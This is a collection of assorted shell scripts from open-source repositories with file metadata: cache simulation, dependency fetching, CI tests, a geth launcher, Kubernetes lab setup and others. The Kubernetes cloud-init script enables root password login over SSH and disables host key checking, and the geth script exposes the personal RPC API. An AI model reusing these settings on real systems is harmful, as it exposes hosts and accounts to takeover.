./cache -t ${cacheSize} -a ${cacheAssoc} -l ${i} -mp ${missPenalty[$COUNTER]} -rp ${cacheRP} -f ${trace}
echo "----------------------------"
COUNTER=$[$(cat $TEMPFILE) + 1]
echo $COUNTER > $TEMPFILE
done
unlink $TEMPFILE
## Sim 3
echo " "
echo "-------------- SIM 3 --------------"
echo " "
declare -a cacheRP=("LRU" "NRU" "SRRIP" "random")
declare -a cacheAssoc=(2 4 8 16)
declare -a cycleMult=(1.04 1.06 1.08 1.16)
tamanoBloque=16
cacheSize=16
missPenalty=5
for i in "${cacheRP[@]}"
do
TEMPFILE=/tmp/$$.tmp
echo 0 > $TEMPFILE
COUNTER=$[$(cat $TEMPFILE)]
for j in "${cacheAssoc[@]}"
do
echo ./cache -t ${cacheSize} -a ${j} -l ${tamanoBloque} -mp ${missPenalty} -rp ${i} -f ${trace} -c ${cycleMult[$COUNTER]}
./cache -t ${cacheSize} -a ${j} -l ${tamanoBloque} -mp ${missPenalty} -rp ${i} -f ${trace} -c ${cycleMult[$COUNTER]}
echo "----------------------------"
COUNTER=$[$(cat $TEMPFILE) + 1]
echo $COUNTER > $TEMPFILE
done
unlink $TEMPFILE
done
done
| true
|
f3a35a674d32303c011d81e0ffda976cf19c1cc2
|
Shell
|
vedi/android-profile
|
/social-providers/android-profile-facebook/download_deps
|
UTF-8
| 1,164
| 2.953125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
set -e
DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
cd $DIR
if [ ! -d libs ];
then
mkdir libs
fi
if [ ! -f libs/simple-fb-4.0.9.jar ];
then
curl -o simple-fb-4.0.9.aar https://dl.bintray.com/sromku/maven/com/sromku/simple-fb/4.0.9/simple-fb-4.0.9.aar
mkdir simple-fb
tar -xvf simple-fb-4.0.9.aar -C simple-fb
mv simple-fb/classes.jar libs/simple-fb-4.0.9.jar
rm -rf simple-fb
rm simple-fb-4.0.9.aar
fi
if [ ! -f libs/gson-1.7.2.jar ];
then
curl -o libs/gson-1.7.2.jar http://central.maven.org/maven2/com/google/code/gson/gson/1.7.2/gson-1.7.2.jar
fi
if [ ! -h libs/AndroidProfile.jar ];
then
ln -s ../../../build/AndroidProfile.jar libs/AndroidProfile.jar
fi
if [ ! -h libs/SoomlaAndroidCore.jar ];
then
ln -s ../../../SoomlaAndroidProfile/libs/SoomlaAndroidCore.jar libs/SoomlaAndroidCore.jar
fi
if [ ! -h libs/square-otto-1.3.2.jar ];
then
ln -s ../../../SoomlaAndroidProfile/libs/square-otto-1.3.2.jar libs/square-otto-1.3.2.jar
fi
if [ ! -d libs/facebook ];
then
curl -L -o libs/facebook.zip http://library.soom.la/fetch/android-profile-facebook/4.6.0?cf=dl_deps
unzip libs/facebook.zip -d libs/
rm libs/facebook.zip
fi
| true
|
a64bdee1e8a31e5a0729985b0ce5022cbfc05823
|
Shell
|
jrtkcoder/zephir
|
/.ci/run-tests.sh
|
UTF-8
| 910
| 3.5
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
#
# This file is part of the Zephir.
#
# (c) Zephir Team <team@zephir-lang.com>
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
# -e Exit immediately if a command exits with a non-zero status.
# -u Treat unset variables as an error when substituting.
set -eu
if [ -z ${CI+x} ] || [ "$CI" != "true" ]; then
printf "This script is designed to run inside a CI container only.\nAborting.\n"
exit 1
fi
if [ "$(php-config --vernum)" -lt "70000" ]; then
test_suite="Extension_Php56"
elif [ "$(php-config --vernum)" -lt "70200" ]; then
test_suite="Extension_Php70"
else
test_suite="Extension_Php72"
fi
php \
-d extension=ext/modules/test.so \
vendor/bin/simple-phpunit \
--colors=always \
--bootstrap unit-tests/ext-bootstrap.php \
--testsuite ${test_suite}
php \
vendor/bin/simple-phpunit \
--colors=always \
--testsuite Zephir
| true
|
20b93e7021cdce63ba2a33903ae29d1506532e10
|
Shell
|
subutai-blueprints/blockchain-in-a-box
|
/files/start_geth
|
UTF-8
| 1,869
| 3.1875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
. /etc/default/geth
if [ "$NETWORK" = "private" ]; then
echo "Running Private Network"
if [ -n "$NETWORK_ID" ]; then
# Check if .ethereum exists
[ -d ~/.ethereum ] || mkdir ~/.ethereum
# Check if generis file has been generated
if [ ! -f ~/.ethereum/genesis.json ]; then
cat <<-EOF >~/.ethereum/genesis.json
{
"config": {
"chainId": $NETWORK_ID,
"homesteadBlock": 0,
"eip155Block": 0,
"eip158Block": 0
},
"difficulty": "0x400",
"gasLimit": "0x8000000",
"alloc": {}
}
EOF
fi
# Check if .ethereum/private exists
[ -d ~/.ethereum/private ] || mkdir ~/.ethereum/private
# Check if chain has been created
if [ ! -d ~/.ethereum/private/geth ]; then
echo "Create private blockchain"
geth --identity "$NETWORK" --datadir ~/.ethereum/$NETWORK init ~/.ethereum/genesis.json
fi
# Check if account exists
ACCOUNT_0=`geth --networkid $NETWORK_ID --datadir ~/.ethereum/$NETWORK account list 2>/dev/null`
if [ -z "$ACCOUNT_0" ]; then
echo "Creating new account"
geth --networkid $NETWORK_ID --datadir ~/.ethereum/$NETWORK account new --password ~/.ethereumpwd 2>/dev/null
fi
# Finally run geth with miner
echo "Firing up geth in private mode"
nice -n 10 geth --networkid $NETWORK_ID --datadir ~/.ethereum/$NETWORK --rpc --rpcport 8545 --rpcapi db,eth,net,web3,personal --verbosity 3 --mine --minerthreads 1
else
echo "Private network with no ID?"
exit 100
fi
else
echo "Firing up geth in testnet mode"
/usr/bin/geth -${NETWORK} --syncmode fast --rpc --rpcport 8545 --rpcapi db,eth,net,web3,personal
fi
# vim: ts=4 et nowrap autoindent
| true
|
e757f55068c44f3937cbc2240207989a915e4b45
|
Shell
|
btc-ag/revengtools
|
/external/idep/src/configure
|
UTF-8
| 2,429
| 3.625
| 4
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"Apache-2.0"
] |
permissive
|
#!/bin/sh
settings_gplusplus() {
CXX="g++"
CXXOUT="-o "
CXXFLAGS="-g "
LDD="g++"
LDOUT="-o "
LDFLAGS=
LIBS=
LDSUF=
}
debug_settings_gplusplus() {
CXXFLAGS="-g"
LDFLAGS="-g"
}
settings_msvc() {
CXX="cl"
CXXOUT="/Fo"
CXXFLAGS="/nologo /EHsc"
LDD="link"
LDOUT="/out:"
LDFLAGS="/nologo"
LIBS=
LDSUF=".exe"
}
debug_settings_msvc() {
CXXFLAGS="$CXXFLAGS /Z7"
LDFLAGS="/fixed:no /debug"
}
##############################################################
msg_chkfor() {
echo -n "checking for "$1" ... "
}
check_system() {
sys=`uname`
msg_chkfor "compiler"
case "$sys" in
*NT)
echo "ok. using msvc."
settings_msvc
;;
*)
echo "ok. using g++."
settings_gplusplus
;;
esac
}
check_cplusplus() {
cat << EOF > tmp.c
#include <iostream>
int main() {
std::cerr << "hello world\n";
return 0;
}
EOF
msg_chkfor "cplusplus"
if ${CXX} ${CXXFLAGS} -c tmp.c $CXXOUT/dev/null 2>&3
then
echo "ok."
else
echo "no."
echo "error: can't compile cplusplus code."
exit 1
fi
}
#############################################################################
while [ $# -gt 0 ]
do
case $1 in
--help)
cat <<EOF
Options for configure:
--debug enable debug
--with-<compiler> gcc,mscv
--help shows usage of the configure script
EOF
exit 0
;;
--debug)
SET_DEBUG=1
;;
esac
shift
done
##############################################################
exec 3> .config.log
exec 4> .config.mk
check_system
if [ "$SET_DEBUG" == 1 ]; then
case $CXX in
"g++")
debug_settings_gplusplus
;;
"cl")
debug_settings_msvc
;;
esac
fi
echo "# idep's .config.mk" >&4
echo "#_______________________" >&4
echo "VERSION=\\\"1.0\\\"" >&4
echo "prefix=$prefix" >&4
echo "CXX=${CXX}" >&4
echo "CXXOUT=${CXXOUT}" >&4
echo "CXXFLAGS=${CXXFLAGS}" >&4
echo "LDD=${LDD}" >&4
echo "LDFLAGS=${LDFLAGS}" >&4
echo "LDOUT=${LDOUT}" >&4
echo "LIBS=${LIBS}" >&4
echo "LDSUF=${LDSUF}" >&4
echo "#_______________________" >&4
echo "" >&4
check_cplusplus
echo "#_______________________" >&4
echo "" >&4
rm -fr tmp.c
# vim:ft=sh
| true
|
fdf785b2bd7ce01ca257dbd46374f00ecee9fdf0
|
Shell
|
thelazyindian/packages_apps_Margarita
|
/push.sh
|
UTF-8
| 1,063
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
AUTHOR_NAME="$(git log -1 $TRAVIS_COMMIT --pretty="%aN")"
FILENAME=Margarita-debug-$(date +"%Y%m%d-%H:%M").apk
COMMIT=$(git log -1 $TRAVIS_COMMIT --pretty="%h")
MSG="Build [#${TRAVIS_BUILD_NUMBER}](https://travis-ci.org/${TRAVIS_REPO_SLUG}/builds/${TRAVIS_BUILD_ID}) ([${COMMIT}](https://github.com/${TRAVIS_REPO_SLUG}/commit/${TRAVIS_COMMIT})) of ${TRAVIS_REPO_SLUG}@${TRAVIS_BRANCH} by ${AUTHOR_NAME} passed."
mv app/build/outputs/apk/debug/app-debug.apk ${FILENAME}
CHANGELOG="*Changelog:*
`$(git log ${TRAVIS_COMMIT_RANGE} --pretty=format:'%h: %s by %aN%n')`"
curl https://slack.com/api/files.upload -F token=${TOKEN} -F channels=#margarita -F title=${FILENAME} -F filename=${FILENAME} -F file=@${FILENAME}
curl https://api.telegram.org/bot${BOT_TOKEN}/sendDocument -F chat_id=${CHAT_ID} -F document=@${FILENAME}
curl https://api.telegram.org/bot${BOT_TOKEN}/sendMessage -d "chat_id=${CHAT_ID}&text=${CHANGELOG}&parse_mode=markdown"
curl https://api.telegram.org/bot${BOT_TOKEN}/sendMessage -d "chat_id=${CHAT_ID}&text=${MSG}&parse_mode=markdown"
| true
|
7dc3866b5f4ccd71e81647bb3ee38041d29544cc
|
Shell
|
RyanLucchese/git-svn-scripts
|
/install.sh
|
UTF-8
| 463
| 3.484375
| 3
|
[
"ISC"
] |
permissive
|
#!/bin/bash
# if $HOME/bin doesn't exist, create it
if [ ! -d $HOME/bin ]; then
mkdir $HOME/bin
# in many cases the default ~/.profile will add $HOME/bin to path if it exists
if [ -e $HOME/.profile ]; then
. $HOME/.profile
fi
fi
# make sure $HOME/bin is in $PATH, otherwise this install script will not work
if [[ ":$PATH:" != *":$HOME/bin:"* ]]; then
echo "$HOME/bin is not in \$PATH! Please set \$PATH appropriately"
exit 1
fi
cp git-svn-* $HOME/bin
| true
|
9d46d5543a8859b023fd201909215c0b97915d89
|
Shell
|
guntukukamal/cloud-ops-AWS-AZURE
|
/aws/terraform/k8s/cloud-init/master.sh
|
UTF-8
| 1,017
| 3.125
| 3
|
[
"Apache-2.0"
] |
permissive
|
# Author: SAVITHRU LOKANATH
# Contact: SAVITHRU AT ICLOUD DOT COM
# Copyright (c) 2018 Juniper Networks, Inc. All rights reserved
#!/bin/sh
# Set SSH password, keyless SSH, stat hosts & install base packages
set -eux
sudo -u root bash << EOF
sed -i -e 's/PermitRootLogin prohibit-password/PermitRootLogin yes/g' -e 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config
service sshd restart
echo root:$1 | chpasswd
apt-get update -y && apt-get install python git wget sshpass ansible -y
cd /root && git clone https://github.com/savithruml/ansible-labs
ssh-keygen -t rsa -C "" -P "" -f "/root/.ssh/id_rsa" -q
sshpass -p $1 ssh-copy-id -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa.pub root@$2
sshpass -p $1 ssh-copy-id -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa.pub root@$3
cd /root/ansible-labs/k8s
echo > /root/ansible-labs/k8s/hosts
cat << 'EOF' >> /root/ansible-labs/k8s/hosts
[masters]
$2
[nodes]
$3
EOF
ansible-playbook -i /root/ansible-labs/k8s/hosts /root/ansible-labs/k8s/site.yml
| true
|
eb84cfa9fe0ca55303b852f5f3639ea1d2283208
|
Shell
|
SerenityOS/serenity
|
/Userland/Shell/Tests/control-structure-as-command.sh
|
UTF-8
| 1,284
| 3.359375
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/Shell
source $(dirname "$0")/test-commons.inc
setopt --verbose
rm -rf /tmp/shell-test 2> /dev/null
mkdir -p /tmp/shell-test
pushd /tmp/shell-test
touch a b c
# Can we do logical stuff with control structures?
ls && for $(seq 1) { echo yes > listing }
if not test "$(cat listing)" = "yes" { fail for cannot appear as second part of '&&' }
rm listing
# FIXME: These should work!
# for $(seq 1) { echo yes > listing } && echo HELLO!
# if not test "$(cat listing)" = "yes" { echo for cannot appear as first part of '&&' }
# rm listing
# Can we pipe things into and from control structures?
# ls | if true { cat > listing }
# if not test "$(cat listing)" = "a b c" { fail if cannot be correctly redirected to }
# rm listing
# ls | for $(seq 1) { cat > listing }
# if not test "$(cat listing)" = "a b c" { fail for cannot be correctly redirected to }
# rm listing
for $(seq 4) { echo $it } | cat > listing
if not test "$(cat listing)" = "1 2 3 4" { fail for cannot be correctly redirected from }
rm listing
if true { echo TRUE! } | cat > listing
if not test "$(cat listing)" = "TRUE!" { fail if cannot be correctly redirected from }
rm listing
popd
rm -rf /tmp/shell-test
echo PASS
| true
|
f57ecf1f4f535b3a99612e2bc889a0e72a47ace3
|
Shell
|
shishir90/node-microservice-mongo-docker
|
/docker_setup/create-image.sh
|
UTF-8
| 332
| 2.671875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
eval `docker-machine env manager1`
cd ..
cd users-service
SERVICE=$(echo users-service | cut -d'/' -f 2)
docker rmi shishir/$SERVICE
sh ./create-image.sh
IMAGE_ID=$(docker images -q $SERVICE)
docker tag $IMAGE_ID shishir/$SERVICE:latest
docker push shishir/$SERVICE:latest
docker rmi $SERVICE
cd ..
| true
|
58d574010fc45c6318bf0eb0fbaf4d641037f64c
|
Shell
|
jpbempel/spring-petclinic
|
/scripts/start.sh
|
UTF-8
| 2,117
| 2.6875
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
#!/bin/bash
OPTIONS=""
if [ "$1" == "ap" ];
then
OPTIONS="-agentpath:../../ap/build/libasyncProfiler.so=start,event=wall,collapsed,file=petclinic_collapsed.txt"
fi
if [ "$1" == "jfr" ];
then
OPTIONS="-XX:StartFlightRecording=filename=petclinic-benchmark-profile.jfr,dumponexit=true,settings=profile"
fi
if [ "$1" == "dd" ];
then
OPT_TRACER="-javaagent:../../dd-java-agent-0.63.0-SNAPSHOT.jar -Ddd.trace.enabled=true"
OPT_SYNTH="-DvetsSyntheticCpu=0 -DvetsSyntheticSleep=0 -DvetsSyntheticSpans=0 -DvetsSyntheticSpanSleep=0"
OPT_PROFILER="-Ddd.profiling.enabled=true -Ddd.profiling.api-key-file=../../profiling-api-key"
OPT_LOGGING="-Ddatadog.slf4j.simpleLogger.defaultLogLevel=info"
OPTIONS="$OPT_TRACER $OPT_PROFILER $OPT_LOGGING $OPT_SYNTH"
fi
if [ "$1" == "dd-profileonly" ];
then
OPT_TRACER="-javaagent:../../dd-java-agent-0.63.0-SNAPSHOT.jar -Ddd.trace.enabled=false"
OPT_SYNTH="-DvetsSyntheticCpu=0 -DvetsSyntheticSleep=0 -DvetsSyntheticSpans=0 -DvetsSyntheticSpanSleep=0"
OPT_PROFILER="-Ddd.profiling.enabled=true -Ddd.profiling.api-key-file=../../profiling-api-key"
OPT_LOGGING="-Ddatadog.slf4j.simpleLogger.defaultLogLevel=info"
OPTIONS="$OPT_TRACER $OPT_PROFILER $OPT_LOGGING $OPT_SYNTH"
fi
# jdk flavors
if [ "$2" == "jdk8" ];
then
export JAVA_HOME=../../jdk/jdk8u275-b01
GC_OPTIONS="-Xloggc:$GC_FILENAME -XX:+PrintGCDetails"
fi
if [ "$2" == "jdk11" ];
then
export JAVA_HOME=../../jdk/jdk-11.0.9+11
GC_OPTIONS="-Xlog:gc*:file=$GC_FILENAME"
fi
if [ "$2" == "jdk15" ];
then
export JAVA_HOME=../../jdk/jdk-15.0.1+9
GC_OPTIONS="-Xlog:gc*:file=$GC_FILENAME"
fi
export PATH=$PATH:$JAVA_HOME/bin
$JAVA_HOME/bin/java ${OPTIONS} \
-Dcom.sun.management.jmxremote.port=18000 -Dcom.sun.management.jmxremote.rmi.port=18000 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.rmi.server.hostname=127.0.0.1 \
-DnbThreads=200 \
-Ddd.service.name=PetClinic-Benchmark \
$GC_OPTIONS \
-jar ../target/spring-petclinic-2.2.0.BUILD-SNAPSHOT.jar > out_petclinic.txt
| true
|
71605aad106808b9e90174d9957d88f4e235e643
|
Shell
|
swstechdev/storj
|
/freenas/overlay/root/bin/storj-pwreset
|
UTF-8
| 889
| 3.859375
| 4
|
[] |
no_license
|
#!/bin/sh
# reset login for StorjAdmin
storj_pw_reset () {
local cfg="/usr/local/www/storjadmin/data/storjconfig.json"
local U=$(cat "${cfg}" | grep username | cut -d '"' -f 4)
local P=$(cat "${cfg}" | grep password | cut -d '"' -f 4)
prompt_yes () { # prompt [YES|no]
while true; do
read -r -p "${1} [Y/n]: " REPLY
case $REPLY in
[qQ]) echo ; echo "Goodbye!"; exit ;;
[yY]|[yY][eE][sS]|"") echo ; ANSWER=Y ; return ;;
[nN]|[nN][oO]) echo ; ANSWER=N ; return 1 ;;
*) printf " \033[31m %s \n\033[0m" " ! Invalid Input Received"
esac
done
}
echo "Your User Name is: "${U}""
prompt_yes "You are about to reset your login!"
if [ "${ANSWER}" = "Y" ]; then
sed -i .old -e "s/"${U}"/""/; s/"${P}"/""/" "${cfg}" && echo "Login Reset" || ee "${cfg}"
exit
else
echo "Goodbye"
fi
}
storj_pw_reset
| true
|
fc3e54d242fe20d422ac4f089fe93f3336a68a1f
|
Shell
|
collective/collective.generic.skel
|
/src/collective/generic/skel/addon/tmpl/+namespace++ndot++nested_namespace++nsdot++project_name+/src/+namespace+/+nested_namespace+/+project_name+/rebuild_i18n.sh_tmpl
|
UTF-8
| 621
| 3.375
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
PRODUCTNAME='${pdn}'
I18NDOMAIN=\$PRODUCTNAME
CWD=\$(dirname $0)
cd \${CWD}
for d in ../../../.. ../..;do
if [[ -d "\${d}/bin" ]];then
export PATH="\${d}/bin:\${PATH}"
fi
done
i18ndude=\$(which i18ndude)
echo "Using \${i18ndude} in \${CWD}"
# Synchronise the .pot with the templates.
\${i18ndude} rebuild-pot --pot locales/\${PRODUCTNAME}.pot --merge locales/\${PRODUCTNAME}-manual.pot --create \${I18NDOMAIN} .
# Synchronise the resulting .pot with the .po files
for po in locales/*/LC_MESSAGES/\${PRODUCTNAME}.po;do
\${i18ndude} sync --pot locales/\${PRODUCTNAME}.pot \$po
done
| true
|
74ac655d432d291d776c6f7eb1ef21f33559d7f0
|
Shell
|
SUSE/brain-tests-release
|
/packages/mariadb-client/packaging
|
UTF-8
| 189
| 2.875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e -x
BIN_DIR=${BOSH_INSTALL_TARGET}/bin
mkdir -p ${BIN_DIR}
# Install the mysql client into the package
zypper install -y mariadb-client
cp /usr/bin/mysql "${BIN_DIR}"
| true
|
e0fa28274cf01132a29abe974652ca6c4a9aa81e
|
Shell
|
andywyatte17/random_stuff
|
/zim/getoeb.sh
|
UTF-8
| 188
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
mkdir openenglishbible
cd openenglishbible
for x in index b{001..069}
do
# echo $x
wget --page-requisites http://openenglishbible.org/oeb/2016.1/read/$x.html
done
cd ..
| true
|
c1cbec71771090ee46bd7e24a1f86c103596fb0a
|
Shell
|
Matt3697/test
|
/mantra.sh
|
UTF-8
| 272
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
#takes two arguments string & number
clear
echo
X=`echo -n $1 | wc -c` #computes number of characters
Y=4;
let R="$X + $Y"
for num in `seq $R`; do
printf "*"
done
echo
for num in `seq $2`; do
echo "* $1 *"
done
for num in `seq $R`; do
printf "*"
done
echo
| true
|
30e4273a0bf231a67b39981876d03e5decfda1d6
|
Shell
|
zoni/dotfiles
|
/src/.zsh/25-completions.zsh
|
UTF-8
| 1,238
| 2.671875
| 3
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
## See also https://thevaluable.dev/zsh-completion-guide-examples/
#
## Make completion matches case-insensitive
##zstyle ':completion:*' matcher-list 'm:{a-zA-Z}={A-Za-z}'
#
## Make completion matches case-insensitive and match on partial words
#zstyle ':completion:*' matcher-list '' 'm:{a-zA-Z}={A-Za-z}' 'r:|[._-]=* r:|=*' 'l:|=* r:|=*'
#
## Complete non-ambiguous entries automatically
#zstyle ':completion:*' insert-unambiguous true
#
## Enable a menu for completions
#zstyle ':completion:*' menu yes select
#
# Make menu completion of files use the same colors as ls (set via $LS_COLORS)
autoload zsh/complist
zstyle ':completion:*:default' list-colors ${(s.:.)LS_COLORS}
# Group completions by source
zstyle ':completion:*:*:*:*:descriptions' format '%F{blue}-- %d --%f'
zstyle ':completion:*' group-name ''
# Configure the `ps` invocation used to complete process lists (for example to
# complete the kill command)
zstyle ':completion:*:*:*:*:processes' command "ps x -o pid,user,comm,cmd"
# https://github.com/marlonrichert/zsh-autocomplete/
zstyle ':autocomplete:*complete*:*' insert-unambiguous yes
zstyle ':autocomplete:*' add-space \
executables reserved-words
zstyle ':autocomplete:*' delay 0.35 # seconds (float)
| true
|
28dcb45d554671aca72e9d901663880eb7f66578
|
Shell
|
sth144/.workflow
|
/src/utils/shared/video/img_to_video_sec.sh
|
UTF-8
| 792
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
# check if file path and duration have been provided
if [ $# -ne 2 ]; then
echo "Please provide input image file path and duration as arguments"
exit 1
fi
# set input file path and duration in seconds
input_file="$1"
duration="$2"
# extract filename and extension from input file path
filename=$(basename -- "$input_file")
extension="${filename##*.}"
filename="${filename%.*}"
# set output file path
output_file="${filename}_${duration}s.mp4"
# run FFmpeg command to create video from image
ffmpeg -loop 1 -i "$input_file" -t "$duration" -pix_fmt yuv420p "/home/<USER>/tmp/$output_file"
# check if FFmpeg command was successful
if [ $? -eq 0 ]; then
echo "Video created successfully: $output_file"
else
echo "Error creating video from image: $input_file"
exit 1
fi
| true
|
3eccbdc5d6ddc84e2a30f6ae07da754c01b227e3
|
Shell
|
sammtcbn/dotfiles
|
/multipass_scripts/ubt2004_pure.bash
|
UTF-8
| 584
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/bash
function wait_multipass_ready()
{
while :
do
multipass list 2> /dev/null
ret=$?
if [ $ret -eq 0 ]; then
return
fi
echo waiting ...
sleep 1
done
}
vmname=ubt2004
echo sudo snap install multipass --classic
sudo snap install multipass --classic
echo
wait_multipass_ready
echo multipass launch --name ${vmname} "20.04"
multipass launch --name ${vmname} "20.04"
echo
wait_multipass_ready
echo multipass networks
multipass networks
echo
echo multipass list
multipass list
echo
echo multipass info ${vmname}
multipass info ${vmname}
| true
|
3e19704b94be63d431f11f5fc3c04fe19ae69da2
|
Shell
|
yangjin97/config
|
/.bashrc
|
UTF-8
| 176
| 2.671875
| 3
|
[] |
no_license
|
export PATH="$PATH:$HOME/.rvm/bin" # Add RVM to PATH for scripting
#alias vim="vim -S ~/.vimrc"
alias vim="/usr/local/bin/vim -S ~/.vimrc"
function cs () {
cd "$@" && ls
}
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.